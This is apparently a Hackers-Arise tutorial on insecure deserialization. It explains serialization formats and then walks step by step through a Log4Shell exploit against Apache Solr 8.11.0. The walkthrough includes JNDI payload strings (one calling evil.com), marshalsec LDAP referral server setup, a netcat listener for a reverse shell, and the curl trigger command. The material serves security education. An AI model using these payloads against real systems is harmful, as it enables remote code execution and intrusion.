National Cyber Warfare Foundation (NCWF)

Welcome back, rising cyberwarriors! Insecure deserialization represents one of the most critical security vulnerabilities in modern software applications, ranking among OWASP’s Top 10 Web Application Security Risks (part of Software and Data Integrity Failures). This vulnerability occurs when applications deserialize untrusted data without proper validation, potentially allowing attackers to execute arbitrary code, manipulate application logic, […]

The post Insecure De-serialization: Millions of Applications May Be Vulnerable first appeared on Hackers Arise.

Welcome back, rising cyberwarriors!

Insecure deserialization represents one of the most critical security vulnerabilities in modern software applications, ranking among OWASP’s Top 10 Web Application Security Risks (part of Software and Data Integrity Failures). This vulnerability occurs when applications deserialize untrusted data without proper validation, potentially allowing attackers to execute arbitrary code, manipulate application logic, or gain unauthorized system access.

The Apache Log4j vulnerability (CVE-2021-44228), discovered in December 2021, exemplifies the devastating impact of insecure deserialization. Known as “Log4Shell,” this zero-day vulnerability affected millions of applications worldwide, demonstrating how a seemingly innocuous logging library could become a gateway for remote code execution attacks.

In this article I want to explores the fundamental concepts of serialization and deserialization, examines the mechanisms behind insecure deserialization attacks, and provides an analysis of how these principles manifested in the Log4j vulnerability.

Historical Context and Timeline

The concept of serialization has been integral to computing since the early days of distributed systems. However, the security implications of deserialization have evolved significantly over time:

Early Era (1990s-2000s):

Serialization primarily used for data storage and inter-process communication

Security considerations were minimal, focusing mainly on data integrity

Limited awareness of deserialization as an attack vector

Recognition Phase (2000s-2010s):

First documented deserialization attacks emerged

Security researchers began identifying patterns in vulnerable implementations

Languages like Java, Python, and .NET showed susceptibility to deserialization exploits

Modern Era (2010s-Present):

Widespread adoption of serialization in web applications and microservices

OWASP recognition of insecure deserialization as a top security risk

High-profile vulnerabilities in popular frameworks and libraries

Log4j Timeline:

2013: Log4j 2.0 released with JNDI lookup functionality

2021: Vulnerability disclosed privately to Apache Foundation

December 9, 2021: CVE-2021-44228 publicly disclosed

December 10, 2021: Proof-of-concept exploits widely available

December 2021: Multiple patches released (2.15.0, 2.16.0, 2.17.0)

Ongoing: Continued discovery of related vulnerabilities and bypass techniques

Understanding Serialization and Deserialization

Serialization is the process of converting an object’s state into a format that can be stored, transmitted, or reconstructed later. This process enables applications to:

Persist object states to disk or databases

Transmit complex data structures over networks

Cache application states for performance optimization

Enable inter-process communication in distributed systems

During serialization, an object’s instance variables, class information, and metadata are encoded into a byte stream or text format. The serialized data contains instructions for reconstructing the original object, including class definitions, field values, and object relationships.

Deserialization reverses the serialization process, reconstructing objects from their serialized representations. This involves:

Data Parsing: Reading and interpreting the serialized format

Class Loading: Instantiating the appropriate object classes

State Reconstruction: Populating object fields with deserialized values

Method Execution: Potentially triggering constructor methods or initialization code

The security risk emerges during this process when applications deserialize untrusted data without proper validation, allowing attackers to manipulate the deserialization process.

Common Serialization Formats

Modern applications utilize various serialization formats, each with distinct characteristics and security implications:

Format	Type	Security Level	Performance	Human Readable	Schema Support
Java Native	Binary	Low	High	No	Implicit
Protocol Buffers	Binary	High	Very High	No	Explicit
JSON	Text	Medium	Medium	Yes	Optional
XML	Text	Medium	Low	Yes	DTD/XSD
YAML	Text	Low	Medium	Yes	Optional
Apache Avro	Binary	High	High	No	Explicit

Java Native Serialization:

Uses Java’s built-in serialization mechanism

Produces binary output with class metadata

Highly vulnerable to deserialization attacks

Common in enterprise Java applications

Protocol Buffers (protobuf):

Google’s language-neutral serialization format

Efficient binary encoding with schema definitions

Generally safer due to strict schema validation

Requires explicit field definitions

Apache Avro:

Schema-based serialization system

Supports schema evolution and compatibility

Binary format with JSON schema definitions

Used extensively in big data ecosystems

JSON (JavaScript Object Notation):

Human-readable text format

Language-independent data interchange

Limited object type support

Generally safer but still vulnerable in certain contexts

XML (eXtensible Markup Language):

Structured markup language

Supports complex hierarchical data

Vulnerable to XML External Entity (XXE) attacks

Requires careful parsing to prevent security issues

YAML (YAML Ain’t Markup Language):

Human-readable data serialization standard

Supports complex data structures

Can execute arbitrary code during deserialization

Requires careful configuration for security

While different programming languages may use varying keywords and functions for serialisation, the underlying principle remains consistent. Whether Java, Python, .NET, or PHP, each language implements serialisation to accommodate specific features or security measures inherent to its environment.

Serialization in PHP involves converting data structures or objects into a string format for storage or transfer, and then reconstructing them later. PHP uses the built-in serialize() function to create this string representation and unserialize() to revert it back. These functions work on arrays, objects, and scalar types but exclude resources and some internal objects. Serialized data includes metadata about types and values, preserving the state of objects including class information. PHP allows customization of serialization in classes via magic methods such as __serialize() and __unserialize(), which are the recommended approach since PHP 7.4, replacing older methods like __sleep() and __wakeup().

Python handles serialization primarily with the pickle module, which can serialize nearly any Python object, including custom classes, into a binary format; this is reversed by pickle.load(). For simpler or language-independent serialization, Python also offers the json module, which converts between JSON strings and Python dictionaries or lists.

Language	Built-in Serialization	Common Customization	JSON Support
PHP	`serialize()`/`unserialize()`	Magic methods (`__sleep`,`__wakeup`,`__serialize`,`__unserialize`)	`json_encode()`/`json_decode()`
Python	`pickle.dump()`/`pickle.load()`	Custom class methods and third-party libraries	`json.dumps()` / `json.loads()`

The Log4j Case

At this point we grasped some basics of serialization and ready to move on to Log4j vulnerability.

Log4j is a Java-based logging framework broadly used in enterprise and cloud applications. Its core function is to append events, messages, and context into logs. With the introduction of JNDI (Java Naming and Directory Interface) lookup functionality in Log4j 2, log messages could reference external resources using special patterns, such as ${jndi:ldap://server/path}.

When Log4j encountered such a lookup in a log message (for example, if an attacker sent it in an HTTP User-Agent or another field that the application logs), the framework would perform a JNDI lookup. If the referenced server was under attacker control, the result could be malicious Java code—serialized as remote objects or stubs—being sent back to the application. Upon receipt, the JVM would deserialize this data, potentially triggering remote code execution.

In classic insecure deserialization, an attacker manipulates serialized data to inject malicious objects or payloads. In Log4j, the exploit chain worked as follows:

Attacker injects ${jndi:ldap://evil.com/a} into any input logged by Log4j.

Log4j parses the log event and initiates a JNDI lookup.

The attacker’s LDAP server responds with a reference to a remote Java class (serialized code).

The application fetches and loads this code, executing it, thus granting the attacker arbitrary code execution.

Reconnaissance

The sheer danger of this vulnerability stems from how ubiquitous the logging package is. Millions of applications, as well as software providers, use Log4j as a dependency in their own code.
For this example, I’ll demonstrate the vulnerability on Apache Solr 8.11.0, which is one example of software known to include this vulnerable Log4j package.

To begin, start with basic reconnaissance to identify which ports are open on the system and what is running on port 8983 in this case.

Exploitation

We’re going to use a free, publicly available tool to set up something called an “LDAP Referral Server.” This server’s job is to take the victim’s first request and send it somewhere else.

Here’s how it works step-by-step:

The victim’s system tries to connect using something like ${jndi:ldap://attackerserver:1389/Resource} — this contacts our LDAP Referral Server.

The LDAP Referral Server then forwards this request to another location, like http://attackerserver/resource.

The victim’s system goes to that second location and downloads code from there.

That code runs on the victim’s machine.

The initial LDAP request can’t deliver the actual malicious code directly — it’s more like a pointer or referral telling the victim’s system where to go next. The LDAP Referral Server acts as a middleman that sends the victim to an HTTP server where the real payload (the malicious code) is hosted. This allows us to deliver and run more complex or larger code that can’t be included in the first LDAP request alone.

To do all this, we need an HTTP server running (on port 8000 or similar) to host and serve that code.

Step 1: Install Java

The first step is to obtain the LDAP Referral Server. We will use the marshalsec utility, available at https://github.com/mbechler/marshalsec. But it requires running Java, version 8 is recommended.

We can download it form the Oracle archive: https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

Run the following commands to configure your system to use this Java version by default:

kali> sudo mkdir /usr/lib/jvm

kali> cd /usr/lib/jvm

kali> sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz

kali> sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1

kali> sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1

kali> sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

kali> sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java

kali> sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac

kali> sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws

Then, check the version:

kali> java -version

Step 2: Download marshalsec

The simplest approach is to download the repository from GitHub:

kali> git clone https://github.com/mbechler/marshalsec

kali> cd marshalsec

Next, we need to build marshalsec with the Java builder maven:

kali> sudo apt install maven

kali> mvn clean package -DskipTests

With the marshalsec utility built, we can start an LDAP referral server to direct connections to our secondary HTTP server (which we will prepare later). The syntax to start the LDAP server is as follows:

kali> java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://IP:Port/#Exploit"

Now that our LDAP server is ready and waiting, we can open a second terminal window to prepare our final payload and set up a secondary HTTP server.

Ultimately, the Log4j vulnerability will execute arbitrary code that you craft in the Java programming language. In this example, we will retrieve a reverse-shell connection to gain control over the target machine.

Create a new file named Exploit.java:

Next, we need to compile this payload with:

kali> javac Exploit.java -source 8 -target 8

We can see a warning – you might not see it yourself. It appears because I have multiple versions of Java installed. Regardless, the Exploit.class file was created successfully.

With the payload now created and compiled, we can start a temporary HTTP server.

kali> python3 -m http.server

Next, we’re ready to prepare a netcat listener:

kali> nc -lnvp port

Finally, all that is left to do is trigger the exploit and fire off our JNDI syntax:

kali> curl 'http://IP:8983/solr/admin/cores?foo=$\{jndi:ldap://IP:1389/Exploit\}'

And we’ve achieved RCE!

Summary

Insecure de-serialization is a serious and common problem in modern software. The Log4j “Log4Shell” vulnerability shows how not checking data carefully during de-serialization can lead to dangerous remote code execution attacks that affect many systems worldwide. This case teaches us an important lesson: any part of software that reads, creates, or runs code from outside inputs must always be carefully checked and protected.

For those interested in improving their cybersecurity skills, especially in understanding and defending against complex vulnerabilities like insecure de-serialization, Hackers-Arise offers expert-led training programs. Check it out!